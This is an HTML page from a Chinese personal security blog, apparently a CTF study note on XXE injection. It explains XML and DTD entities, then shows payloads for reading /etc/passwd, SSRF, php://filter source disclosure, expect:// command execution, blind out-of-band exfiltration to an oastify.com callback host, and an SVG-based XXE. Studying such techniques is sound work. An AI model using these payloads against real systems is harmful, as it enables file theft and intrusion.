<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>我的技术与生活——XXE漏洞 | L1uxsn&#39;Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="shortcut icon" href="/imgs/shortcut-icon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/public.css" />
  <link rel="stylesheet" href="/css/layout.css" />
  <link rel="stylesheet" href="/css/iconfont.css" />
  <link rel="stylesheet" href="/css/APlayer.min.css" />
  <script src="/js/APlayer.min.js"></script>
  <script src="/js/jquery.min.js"></script>
  <script src="/js/jquery.pjax.min.js"></script>

  <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
  <script>
    document.title = `我的技术与生活——XXE漏洞`
  </script>
<meta name="generator" content="Hexo 8.1.1"></head>

<style>
  .load {
    width: 100%;
    height: 100vh;
    background-color: rgb(37, 35, 40);
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    position: relative;
    z-index: 9999;
  }
  .load-circle {
    width: 80px;
    height: 80px;
    border: 8px solid orange;
    border-bottom-color: transparent;
    border-radius: 50%;
    display: flex;
    justify-content: center;
    align-items: center;
    animation: rotate 1s linear infinite;
    filter: drop-shadow(0 0 3px orange);
  }
  .load-circle-inner {
    width: 40px;
    height: 40px;
    border: 8px solid orange;
    border-top-color: transparent;
    border-radius: 50%;
    animation: rotate-reverse .5s linear infinite;
  }
  .load-text {
    margin-top: 20px;
    font-size: 24px;
    color: orange;
    display: flex;
  }
  .load-text span {
    margin: 0 5px;
    text-shadow: 5px 5px 5px orange;
    animation: move 1s linear infinite;
  }
  .load-text span:nth-child(1) {
    animation-delay: -0.6s;
  }
  .load-text span:nth-child(2) {
    animation-delay: -0.5s;
  }
  .load-text span:nth-child(3) {
    animation-delay: -0.4s;
  }
  .load-text span:nth-child(4) {
    animation-delay: -0.3s;
  }
  .load-text span:nth-child(5) {
    animation-delay: -0.2s;
  }
  .load-text span:nth-child(6) {
    animation-delay: -0.1s;
  }
  @keyframes rotate {
    0% { transform: rotate(0); }
    100% { transform: rotate(360deg); }
  }
  @keyframes rotate-reverse {
    0% { transform: rotate(0); }
    100% { transform: rotate(-360deg); }
  }
  @keyframes move {
    0% { transform: translateY(0%) rotate(0) scale(1); }
    20% { transform: translateY(20%) rotate(10deg) scale(1.2); }
    80% { transform: translateY(-10%) rotate(-20deg) scale(.8);}
    100% { transform: translateY(0) rotate(0) scale(1); }
  }

  .progress {
    position: fixed;
    left: 0; top: 0;
    width: 0;
    height: 3px;
    background-color: green;
    transition: all cubic-bezier(0.215, 0.610, 0.355, 1) .1s;
    z-index: 9999;
  }

  .to-up {
    animation: toUp .5s 1;
  }
  .gray {
    position: fixed;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    z-index: 9999;
    display: none;
    pointer-events: none;
    background-color: #000;
    mix-blend-mode: color;
  }
  @keyframes toUp {
    from { transform: translateY(15px); opacity: 0; }
    to { transform: translateY(0) ; opacity: 1; }
  }
</style>
<body>
  <div id="load" class="load">
    <div class="load-circle">
      <div class="load-circle-inner"></div>
    </div>
    <p class="load-text">
      <span>L</span>
      <span>O</span>
      <span>A</span>
      <span>D</span>
      <span>I</span>
      <span>N</span>
      <span>G</span>
    </p>
  </div>
  <div id="container" class="container w-100 vh-100" style="display: none;">
    <header class="header">
  <div class="header-wrapper">
    <div class="header-left">
      <div class="header-search">
        <input id="search-input" type="text" class="header-search--input" placeholder="请输入要检索的文章标题" />
        <span id="search-btn" class="header-search--icon"><i class="iconfont icon-sousuo"></i></span>
      </div>
      <div id="search-layer" class="header-search--layer hidden">
        <p class="title">
          <span>以下是搜索内容：</span>
          <span id="close-layer-btn">关闭</span>
        </p>
        <ul>
        </ul>
      </div>
    </div>
    <div class="header-right">
      <ul class="header-menu">
        <li>
          <a href="https://l1uxsn.github.io/">
            <i class="header-menu--icon iconfont icon-shouye"></i>
            <span class="header-menu--span">首页</span>
          </a>
        </li>
        <li>
          <a href="https://l1uxsn.github.io/log">
            <i class="header-menu--icon iconfont icon-rizhi"></i>
            <span class="header-menu--span">日志</span>
          </a>
        </li>
        <li>
          <a href="https://l1uxsn.github.io/link">
            <i class="header-menu--icon iconfont icon-youqinglianjie"></i>
            <span class="header-menu--span">友情链接</span>
          </a>
        </li>
        <li>
          <a href="https://l1uxsn.github.io/about">
            <i class="header-menu--icon iconfont icon-guanyuwomen"></i>
            <span class="header-menu--span">关于我</span>
          </a>
        </li>
      </ul>
    </div>
  </div>
</header>

<script>
  const ipt = document.querySelector('#search-input')
  const btn = document.querySelector('#search-btn')
  const layer = document.querySelector('#search-layer')
  const posts = JSON.parse(`[{"title":"SQL注入相关","path":"2026/07/17/SQL注入相关/"},{"title":"SSRF","path":"2026/07/17/SSRF/"},{"title":"Linux提权","path":"2026/07/17/Linux提权/"},{"title":"XXE漏洞","path":"2026/07/17/XXE漏洞/"},{"title":"nodejs原型链污染","path":"2026/07/17/nodejs原型链污染/"},{"title":"RCE","path":"2025/03/21/RCE/"},{"title":"pickle反序列化","path":"2026/07/17/pickle反序列化/"},{"title":"sql提权","path":"2026/07/17/sql提权/"},{"title":"twig与smarty模板的ssti","path":"2026/07/17/twig与smarty模板的ssti/"},{"title":"python原型链污染","path":"2026/07/17/python原型链污染/"},{"title":"其他类型的数据库的注入","path":"2026/07/17/其他类型的数据库的注入/"}]`)
  ipt.addEventListener('keyup', e => {
    if (e.key === 'Enter') {
      handleSearch()
    }
  })
  btn.addEventListener('click', () => {
    handleSearch()
  })

  document.querySelector('#close-layer-btn').addEventListener('click', () => {
    layer.classList.toggle('hidden')
  })

  function handleSearch() {
    if (ipt.value.trim() === '') {
      return
    }
    let html = ''
    const targetPosts = posts.filter(post => post.title.includes(ipt.value))
    targetPosts.forEach(post => {
      html += `
        <li>
          <div>
            <a href="/${post.path}">${post.title.replace(new RegExp(ipt.value), `<span>${ipt.value}</span>`)}</a>
          </div>
          <img src="${post.cover || '/imgs/default-cover.webp' }" />
        </li>
      `
    })
    if (html.trim () === '') {
      html += '<p class="empty">没有搜索到内容</p>'
    }
    layer.querySelector('ul').innerHTML = html
    layer.classList.remove('hidden')
  }
</script> 
    <section id="main" class="main">
      <div class="main-left-wrapper">
<div class="main-left">
  <div class="main-left--block">
    <div class="main-left--info">
      <img src="/imgs/avatar.jpg"" class="main-left--avatar" />
      <div class="main-left--intro">
        <p class="main-left--name">L1uxsn.</p>
        <div class="main-left--tags">
          <span class="main-left--tag"></span>
          <span class="main-left--tag"></span>
        </div>
      </div>
    </div>
  
    <div>
      <div class="main-left--motto">
        <p>“感谢永远有歌把心境道破”</p>
        <p>“宏愿纵未了,奋斗总不太晚”</p>
      </div>
      <div class="main-left--github">
        <span class="line"></span>
        <a href="https://L1uxsn.github.io"><i class="logo iconfont icon-github-fill"></i></a>
        <span class="line"></span>
      </div>
      <div class="main-left--statics">
        <a href="/categories">
          <div>
            <span>0</span>
            <span>分类</span>
          </div>
        </a>
        <a href="/tags">
          <div>
            <span>0</span>
            <span>标签</span>
          </div>
        </a>
        <a href="/archives">
          <div>
            <span>2 </span>
            <span>归档</span>
          </div>
        </a>
      </div>
    </div>
  </div>

  <div class="main-left--block">
    <ul class="main-left--menu">
      
        <li>
          <a href="/">
            <span class="header-menu--span">小站首页</span>
            <i class="header-menu--icon iconfont icon-shouye"></i>
          </a>
        </li>
      
        <li>
          <a href="/log">
            <span class="header-menu--span">个人日志</span>
            <i class="header-menu--icon iconfont icon-rizhi"></i>
          </a>
        </li>
      
        <li>
          <a href="/link">
            <span class="header-menu--span">友情链接</span>
            <i class="header-menu--icon iconfont icon-youqinglianjie"></i>
          </a>
        </li>
      
        <li>
          <a href="/about">
            <span class="header-menu--span">关于自己</span>
            <i class="header-menu--icon iconfont icon-guanyuwomen"></i>
          </a>
        </li>
      
        <li>
          <a href="/tools">
            <span class="header-menu--span">我的工具</span>
            <i class="header-menu--icon iconfont icon-gongju"></i>
          </a>
        </li>
      
    </ul>
  </div>

  <div class="main-left--block">
    <div class="main-left--site">
      <h5 class="main-left--title">
        <span>站点信息</span>
        <i class="iconfont icon-zhandian"></i>
      </h5>
      <p class="main-left--subtitle">
        <span>文章数目：</span>
        <span>11 篇</span>
      </p>
      <p class="main-left--subtitle">
        <span>最近动态：</span>
        <span>今天</span>
      </p>
      <p class="main-left--subtitle">
        <span>上线时间：</span>
        <span>1613天</span>
      </p>
      <p class="main-left--subtitle">
        <span>当前版本：</span>
        <span>v1.0.2</span>
      </p>
    </div>
  </div>
</div></div>
      <div id="main-container" class="main-container">


  <link rel="stylesheet" href="/css/partial/article.css" />

<div class="article-container">
  <div class="article">
    <h1 class="article-title">XXE漏洞</h1>
    <div class="article-info">
      <div class="article-info--item">
        <div class="article-info--info">
          
          <div class="article-info--categories">
            <span>分类：</span>
            
          </div>
          
          
          <div class="article-info--tags">
            <span>标签：</span>
            
          </div>
          
          <p class="article-info--date">日期：2026-07-17 22:02:55</p>
        </div>
        <img src="/imgs/default-cover.webp" alt="" class="article-cover">
      </div>
    </div>
    <article class="article-content markdown-body">
      <h1 id="XXE漏洞"><a href="#XXE漏洞" class="headerlink" title="XXE漏洞"></a>XXE漏洞</h1><h2 id="前置知识：XML"><a href="#前置知识：XML" class="headerlink" title="前置知识：XML"></a>前置知识：XML</h2><h3 id="XML是什么？"><a href="#XML是什么？" class="headerlink" title="XML是什么？"></a>XML是什么？</h3><p><strong>XML是一种标记语言，XML指可扩展标记语言（EXtensensible Markup Language），把数据结构化后传输给对方让对方在结构化的数据中进行读取</strong></p>
<p>标签无意义且没有功能性，被设计为具有自我描述性：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/1.png"></p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/2.png"></p>
<h3 id="XML与HTML的区别？"><a href="#XML与HTML的区别？" class="headerlink" title="XML与HTML的区别？"></a>XML与HTML的区别？</h3><p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/3.png"></p>
<h3 id="XML基本语法"><a href="#XML基本语法" class="headerlink" title="XML基本语法"></a>XML基本语法</h3><ul>
<li><p>1.所有XML标签必须闭合</p>
</li>
<li><p>2.XML必须进行正确的嵌套</p>
</li>
<li><p>3.标签对大小写敏感</p>
</li>
<li><p>4.XML文档必须要有根元素（所有其他元素的父元素）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;root&gt;</span><br><span class="line">	&lt;student&gt;</span><br><span class="line">		&lt;name&gt;......&lt;/name&gt;</span><br><span class="line">	&lt;/student&gt;</span><br><span class="line">&lt;/root&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>5.没有缩进要求，建议首行缩进</p>
</li>
<li><p>6.头声明可有可无（定义XML版本和所使用的编码），建议写</p>
<p><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</code></p>
</li>
<li><p>7.<strong>实体引用：在xml中，一些字符拥有特殊的意义。</strong></p>
<p>如果把字符 “&lt;” 放在XML元素中，会发生错误，这是因为解析器会把它当作新元素的开始。</p>
<p><code>&lt;message&gt;if salary &lt; 11000 then &lt;/message&gt;</code>   报错！！！</p>
</li>
</ul>
<p>为了避免这个错误，会使用实体引用来代替 “&lt;” 字符</p>
<p>​    <code>&lt;message&gt;if salary &amp;lt; 11000 then &lt;/message&gt;</code>  </p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/4.png"></p>
<h3 id="使用php解析xml文档"><a href="#使用php解析xml文档" class="headerlink" title="使用php解析xml文档"></a>使用php解析xml文档</h3><ul>
<li>1.<strong>php页面调用xml</strong></li>
</ul>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/5.png"></p>
<ul>
<li><p>2.**使用DOMDocument读取XML文档 **</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/6.png"></p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/7.png"></p>
</li>
</ul>
<p>指定读取：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/8.png"></p>
<ul>
<li><p><strong>混合读取：</strong></p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/9.png"></p>
</li>
</ul>
<h3 id="DTD声明（Document-Type-Definition）"><a href="#DTD声明（Document-Type-Definition）" class="headerlink" title="DTD声明（Document Type Definition）"></a>DTD声明（Document Type Definition）</h3><p>(文档类型定义可定义合法的XML文档构建模块，它使用一系列合法的元素来定义文档的结构)</p>
<ul>
<li>内部的声明：（没有DTD时xml文件可以随意定义添加标签）</li>
</ul>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/10.png"></p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/11.png"></p>
<ul>
<li><p>2.外部引入DTD文件：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/12.png"></p>
</li>
</ul>
<h2 id="XML几种实体介绍"><a href="#XML几种实体介绍" class="headerlink" title="XML几种实体介绍"></a>XML几种实体介绍</h2><h4 id="什么是实体？"><a href="#什么是实体？" class="headerlink" title="什么是实体？"></a>什么是实体？</h4><p><strong>实体是对数据的引用；根据实体种类的不同，XML解析器将使用实体的替代文本或者外部文档的内容来替代实体引用（使用实体可以去掉字符的含义）</strong></p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/13.png"></p>
<h4 id="实体演示："><a href="#实体演示：" class="headerlink" title="实体演示："></a>实体演示：</h4><p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/14.png"></p>
<p><strong>实体可迭代使用</strong></p>
<p><strong>XXE漏洞产生主要原因是外部调用文件</strong></p>
<h4 id="参数实体："><a href="#参数实体：" class="headerlink" title="参数实体："></a>参数实体：</h4><p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/15.png"></p>
<h3 id="XXE漏洞成因介绍"><a href="#XXE漏洞成因介绍" class="headerlink" title="XXE漏洞成因介绍"></a>XXE漏洞成因介绍</h3><p><strong>XXE(XML External Entity Inject)全称 XML外部实体注入</strong></p>
<h4 id="XXE漏洞演示："><a href="#XXE漏洞演示：" class="headerlink" title="XXE漏洞演示："></a>XXE漏洞演示：</h4><p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/16.png"></p>
<p>利用file伪协议读取 &#x2F;etc&#x2F;passwd</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/17.png"></p>
<h4 id="不同程序支持的伪协议："><a href="#不同程序支持的伪协议：" class="headerlink" title="不同程序支持的伪协议："></a>不同程序支持的伪协议：</h4><p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/18.png"></p>
<h3 id="XXE使用外部实体读取文件："><a href="#XXE使用外部实体读取文件：" class="headerlink" title="XXE使用外部实体读取文件："></a>XXE使用外部实体读取文件：</h3><p>列题：</p>
<p>进入题目发现是一个登录框，输入成功或者失败都会回显出用户名</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/19.png"></p>
<p>此时查看源码发现是XML格式的提交</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/20.png"></p>
<p>可以利用用户名会回显这点外部实体读取文件</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/21.png"></p>
<h3 id="参数实体及http伪协议XXE利用"><a href="#参数实体及http伪协议XXE利用" class="headerlink" title="参数实体及http伪协议XXE利用"></a>参数实体及http伪协议XXE利用</h3><p>此时对伪协议做了过滤，无法读取目标文件</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/22.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">此时可尝试命名实体，（命名实体只能在DTD文档内使用）在kali中创建 1.dtd文件（内容为：&lt;!DOCTYPE root [&lt;!ENTITY ben SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;）,再 ip add获取kali的ip，python3 -m http.server 80 开启http服务，再远程访问该kali上的1.dtd文件，利用参数实体</span><br></pre></td></tr></table></figure>

<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/23.png"></p>
<h4 id="利用XXE进行SSRF利用："><a href="#利用XXE进行SSRF利用：" class="headerlink" title="利用XXE进行SSRF利用："></a>利用XXE进行SSRF利用：</h4><p>（<code>http://10.1.2.3</code>为内网ip地址）</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/24.png"></p>
<p>获取flag</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/25.png"></p>
<h3 id="XXE利用php伪协议读取文件"><a href="#XXE利用php伪协议读取文件" class="headerlink" title="XXE利用php伪协议读取文件"></a>XXE利用php伪协议读取文件</h3><p>想要读取源码index.php,如果直接读取的话会被页面解析掉，导致看不到源码，所以可以使用base64编码后回显，再base64解码的方式得到源码，使用php:&#x2F;&#x2F;filter</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/26.png"></p>
<h3 id="利用expect扩展进行命令执行"><a href="#利用expect扩展进行命令执行" class="headerlink" title="利用expect扩展进行命令执行"></a>利用expect扩展进行命令执行</h3><p>expect协议 处理交互式的流</p>
<p>expect伪协议里提交命令（前提：PHP安装expect扩展）</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/27.png"></p>
<p><strong>注意：expect伪协议里出现以下七个字符会报错</strong></p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/28.png"></p>
<h3 id="无回显XXE带外数据"><a href="#无回显XXE带外数据" class="headerlink" title="无回显XXE带外数据"></a>无回显XXE带外数据</h3><ul>
<li><p>1.查看漏洞:</p>
<p>法一：DNSlog查看漏洞</p>
<p><code>&lt;!DOCTYPE root [&lt;!ENTITY % xxe SYSTEM &quot;http://vzyhtmj4aswbu8q21dusvheo3f96xxlm.oastify.com&quot;&gt;] %xxe&gt;</code></p>
</li>
</ul>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/29.png"></p>
<p>​	法二：nc查看漏洞</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/30.png"></p>
<ul>
<li><p>2.带外数据</p>
<p>在kali里写入一个1.dtd文件，同时监听端口（7777）</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/31.png"></p>
</li>
</ul>
<p>​	让目标网站去读取kali里的1.dtd文件</p>
<p>​	<img src="/img/XXE%E6%BC%8F%E6%B4%9E/32.png"></p>
<h3 id="Xinclude"><a href="#Xinclude" class="headerlink" title="Xinclude"></a>Xinclude</h3><p><strong>xinclude可以包含一个XML文件，调用一个写好的XML文件</strong></p>
<p>基本语法：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/33.png"></p>
<p>实列：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/34.png"></p>
<p>与php文件包含区别：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/35.png"></p>
<p>代码解释：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/36.png"></p>
<p>靶场操作：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/37.png"></p>
<h3 id="利用SVG进行XXE漏洞利用"><a href="#利用SVG进行XXE漏洞利用" class="headerlink" title="利用SVG进行XXE漏洞利用"></a>利用SVG进行XXE漏洞利用</h3><p>SVG文件介绍： </p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/38.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; standalone=&quot;yes&quot;?&gt;          ——固定格式</span><br><span class="line">&lt;!DOCTYPE svg[&lt;!ENTITY xxe SYSTEM &quot;file:///etc.passwd&gt;]&gt;    ——payload</span><br><span class="line">&lt;svg width=&quot;500px&quot; height=&quot;100px&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot;        ——固定格式    xmlns:xlink=&quot;http:///www.w.org/1999/xlink&quot; version=&quot;1.1&quot;&gt;      ——固定格式</span><br><span class="line">&lt;text font-family=&quot;Verdana&quot; font-size=&quot;16&quot; x=&quot;10&quot; y=&quot;40&quot;&gt;&amp;xxe;&lt;/text&gt;&lt;/svg&gt;     ——回显字体以及位置设置</span><br></pre></td></tr></table></figure>

<p>结果显示：</p>
<p><img src="/img/XXE%E6%BC%8F%E6%B4%9E/39.png"></p>

    </article>
    
    <div class="read-nums">
      <!-- id 将作为查询条件 -->
      <span id="2026/07/17/XXE漏洞/" class="leancloud_visitors" data-flag-title="Your Article Title">
        <em class="post-meta-item-text">浏览量</em>
        <i class="leancloud-visitors-count"></i>
      </span>
    </div>
    <div class="comments-intro">
      <h2>评论区</h2>
      <p>欢迎你留下宝贵的意见，昵称输入QQ号会显示QQ头像哦~</p>
    </div>
    <div id="vcomments" class="vcomments"></div>
    
  </div>
  <div class="article-catelogue">
    <div class="article-catelogue--wrapper">
      <div class="catelogue catelogue-1">
        <h3>目录</h3>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#XXE%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.</span> <span class="toc-text">XXE漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86%EF%BC%9AXML"><span class="toc-number">1.1.</span> <span class="toc-text">前置知识：XML</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#XML%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.1.1.</span> <span class="toc-text">XML是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XML%E4%B8%8EHTML%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%9F"><span class="toc-number">1.1.2.</span> <span class="toc-text">XML与HTML的区别？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XML%E5%9F%BA%E6%9C%AC%E8%AF%AD%E6%B3%95"><span class="toc-number">1.1.3.</span> <span class="toc-text">XML基本语法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8php%E8%A7%A3%E6%9E%90xml%E6%96%87%E6%A1%A3"><span class="toc-number">1.1.4.</span> <span class="toc-text">使用php解析xml文档</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#DTD%E5%A3%B0%E6%98%8E%EF%BC%88Document-Type-Definition%EF%BC%89"><span class="toc-number">1.1.5.</span> <span class="toc-text">DTD声明（Document Type Definition）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XML%E5%87%A0%E7%A7%8D%E5%AE%9E%E4%BD%93%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.2.</span> <span class="toc-text">XML几种实体介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%AE%9E%E4%BD%93%EF%BC%9F"><span class="toc-number">1.2.1.</span> <span class="toc-text">什么是实体？</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E4%BD%93%E6%BC%94%E7%A4%BA%EF%BC%9A"><span class="toc-number">1.2.2.</span> <span class="toc-text">实体演示：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E5%AE%9E%E4%BD%93%EF%BC%9A"><span class="toc-number">1.2.3.</span> <span class="toc-text">参数实体：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XXE%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.2.4.</span> <span class="toc-text">XXE漏洞成因介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#XXE%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA%EF%BC%9A"><span class="toc-number">1.2.4.1.</span> <span class="toc-text">XXE漏洞演示：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%8D%E5%90%8C%E7%A8%8B%E5%BA%8F%E6%94%AF%E6%8C%81%E7%9A%84%E4%BC%AA%E5%8D%8F%E8%AE%AE%EF%BC%9A"><span class="toc-number">1.2.4.2.</span> <span class="toc-text">不同程序支持的伪协议：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XXE%E4%BD%BF%E7%94%A8%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%EF%BC%9A"><span class="toc-number">1.2.5.</span> <span class="toc-text">XXE使用外部实体读取文件：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E5%AE%9E%E4%BD%93%E5%8F%8Ahttp%E4%BC%AA%E5%8D%8F%E8%AE%AEXXE%E5%88%A9%E7%94%A8"><span class="toc-number">1.2.6.</span> <span class="toc-text">参数实体及http伪协议XXE利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8XXE%E8%BF%9B%E8%A1%8CSSRF%E5%88%A9%E7%94%A8%EF%BC%9A"><span class="toc-number">1.2.6.1.</span> <span class="toc-text">利用XXE进行SSRF利用：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XXE%E5%88%A9%E7%94%A8php%E4%BC%AA%E5%8D%8F%E8%AE%AE%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="toc-number">1.2.7.</span> <span class="toc-text">XXE利用php伪协议读取文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8expect%E6%89%A9%E5%B1%95%E8%BF%9B%E8%A1%8C%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">1.2.8.</span> <span class="toc-text">利用expect扩展进行命令执行</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%9B%9E%E6%98%BEXXE%E5%B8%A6%E5%A4%96%E6%95%B0%E6%8D%AE"><span class="toc-number">1.2.9.</span> <span class="toc-text">无回显XXE带外数据</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Xinclude"><span class="toc-number">1.2.10.</span> <span class="toc-text">Xinclude</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8SVG%E8%BF%9B%E8%A1%8CXXE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">1.2.11.</span> <span class="toc-text">利用SVG进行XXE漏洞利用</span></a></li></ol></li></ol></li></ol>
      </div>
      
        <div class="catelogue catelogue-2">
          
            <p>
              <span>上一篇：</span>
              <a href="/2026/07/17/其他类型的数据库的注入/">其他类型的数据库的注入</a>
            </p>
           
          
            <p>
              <span>下一篇</span>
              <a href="/2026/07/17/twig与smarty模板的ssti/">twig与smarty模板的ssti</a>
            </p>
          
        </div>
      
    </div>
  </div>
</div>


<script>
  // var定义，避免pjax重新进来造成的重复声明错误
  var config = JSON.parse('{"enable":true,"appId":"Pf8zCXGEH1qsprnWfikVVujL-gzGzoHsz","appKey":"qOqoiUHhH1TGtLRUYURkLRQX","placeholder":"请留下你宝贵的意见吧~","meta":["nick"],"recordIP":true,"visitor":true,"enableQQ":true}')
  new Valine({
    el: '#vcomments',
    appId: config.appId,
    appKey: config.appKey,
    placeholder: config.placeholder,
    meta: config.meta,
    recordIP: config.recordIP,
    visitor: config.visitor,
    enableQQ: config.enableQQ,
    path: '2026/07/17/XXE漏洞/'
  })
</script>


<script>
  $(document).on('pjax:complete', function() {
    const tocs = document.querySelector('.toc')
    const links = tocs ? tocs.querySelectorAll('a') : []
    links.forEach(link => {
      link.addEventListener('click', e => {
        const href = decodeURIComponent(e.href)
        href.search(/#(.*)/)
        const id = RegExp.$1
        const target = document.querySelector('#' + id)
        const top = target.offsetTop
        document.documentElement.scrollTo({
          top: top - 100,
          behavior: 'smooth'
        })
        e.preventDefault()
      })
    })
  })
</script> 

</div>
      <div class="main-right-wrapper"><div class="main-right">
  <div class="main-right--board">
    <div class="main-right--title">
      <h5>公告栏</h5>
      <i class="iconfont icon-gonggao"></i>
    </div>
    <div class="main-right--content">
      从何时开始忌讳空山无人,从何时开始怕遥望星辰 
    </div>
  </div>

  <div id="aplayer" class="main-right--music"></div>

  <div class="operate-items">
    <div class="operate-item backtop">
      <i class="iconfont icon-huidaodingbu"></i>
      <span>回到顶部</span>
    </div>
    
    <div class="operate-item turn-comment hidden">
      <i class="iconfont icon-pinglun"></i>
      <span>查看评论</span>
    </div>
    
  </div>

  <div class="main-right--site">
    <div class="main-right--power">
      <p>Power By <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/docs/">Hexo</a>.</p>
      <p>Theme：<a target="_blank" rel="noopener" href="https://github.com/Aizener/hexo-theme-cola">Cola.</a></p>
    </div>
    <p class="main-right--refer"><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/#/Integrated/index">蜀ICP备2022005384号-1</a> </p>
  </div>
</div>

<script>
  function setOperateItem () {
    const reg = /\d{4}\/\d{2}\/\d{2}\/.+/
    const path = location.pathname
    const operateDom = document.querySelector('.main-right .operate-items')
    const commentDom = document.querySelector('.turn-comment')
    const cateloguDom = document.querySelector('.article-catelogue > .article-catelogue--wrapper');

    if (commentDom) {
      if (reg.test(path) || path.match(/\/log\/.+/)) {
        commentDom.classList.remove('hidden')
        const newDom = operateDom.cloneNode(true);
        const _backtopDom = newDom.querySelector('.backtop');
        const _commentDom = newDom.querySelector('.turn-comment');
